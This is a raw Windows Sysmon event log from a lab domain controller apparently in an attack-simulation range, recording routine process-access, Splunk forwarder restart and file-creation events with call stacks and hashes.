13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8EDF-6005-9D00-00000000A301}47004752C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.824{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2532 10341000x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.794{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.794{59A5CD1D-8E56-6005-3000-00000000A301}25323928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.806{59A5CD1D-8EDF-6005-9D00-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2532C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2021-01-18 13:36:31.763 11241100x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2021-01-18 13:36:31.763 11241100x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.763{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2021-01-18 13:36:31.763 11241100x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:36:31.653{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2021-01-18 13:36:31.653 11241100x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2021-01-18 13:36:31.622 11241100x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2021-01-18 13:36:31.622 11241100x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2021-01-18 13:36:31.622 11241100x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2021-01-18 13:36:31.622 11241100x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2021-01-18 13:36:31.622 11241100x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2021-01-18 13:36:31.622 11241100x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:36:31.622{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2021-01-18 13:36:31.622 11241100x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.012{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2021-01-18 13:36:31.012 11241100x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.012{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2021-01-18 13:36:31.012 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
